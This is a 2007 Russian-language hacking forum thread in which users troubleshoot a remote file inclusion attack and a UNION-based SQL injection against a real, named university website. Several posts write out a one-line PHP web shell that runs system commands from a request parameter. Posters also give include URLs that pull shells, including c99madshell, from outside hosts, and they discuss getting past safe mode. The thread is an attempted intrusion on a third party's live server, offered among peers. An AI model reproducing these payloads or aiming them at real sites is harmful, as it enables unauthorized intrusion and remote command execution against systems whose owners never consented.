PHP & SQL inj

Discussion in 'Уязвимости' started by nikoTM, 25 Sep 2007.

  1. nikoTM

    nikoTM Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    привет всем..люди у мя такая проблема на сайте
    есть такое index.php?p= удаленный инклудинг...но по неизвестным мне причинам он не поддерживает например такое
    PHP:
    <pre><? @system($_REQUEST['c']); ?></pre>
    (который я кинул в txt и впихнул в НАРОД). В результате такая страница http://ихсайт/?p=http://что-то.narod.ru/file.txt?c=ls не катит. Но что самое удивидельное когда file.txt такой
    PHP:
    <? echo 'a'?>
    ссылка катит..вот не пойму с чего бы? :confused:

    а про SQL inj там еще есть такое
    но не смог понята почиму он не принимает сам запрос такой результ
    You have an error in your SQL syntax near 'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13/* ORDER BY data DESC ' at line 1
     
  2. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Мда.
    1) Не в том разделе
    2) http://ихсайт/?p=http://что-то.narod.ru/file.txt&c=ls
     
  3. nikoTM

    nikoTM Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    ыы)
    1. "Не в том разделе" ок..сорь)
    2. http://ихсайт/?p=http://что-то.narod.ru/file.txt&c=ls ну понятно ж что так
    http://sicurezza.uniss.it/index.php?p=http://axhack.narod.ru/1.txt?c=ls ))
     
  4. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    http://sicurezza.uniss.it/index.php?p=http://dermoshell.narod.ru/c99madshell.php
    Safe-mode: ON (secure)
    Может поэтому?
     
  5. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    не
    <pre><? @system($_REQUEST['c']); ?></pre>
    а
    <pre><? @system(stripslashes($_REQUEST['c'])); ?></pre>
    Должно работать... :D
    =========
    ИМХО не в этом там проблема :rolleyes: но попытка не пытка :)
     
    #5 Ponchik, 25 Sep 2007
    Last edited: 25 Sep 2007
  6. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    При вкл. сейф моде ничего не будет работать. ;)
     
  7. nikoTM

    nikoTM Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    понятно огромное спс
     
  8. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    При включенном чейф моде юзай мозг)))
    Ну или security lab на крайняк, методов обхода туча)
     
  9. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    310
    Reputations:
    201
    Перемещено.

    2Автор, в следующий раз будь внимательнее.
     
    1 person likes this.
  10. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    функция system() почти везде отключается, если админы грамотные.
     
  11. nikoTM

    nikoTM Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    2NeMiNeM, ок сорь..

    2Termin@L, может и туча..но я пока ох какой новичок))
     
    1 person likes this.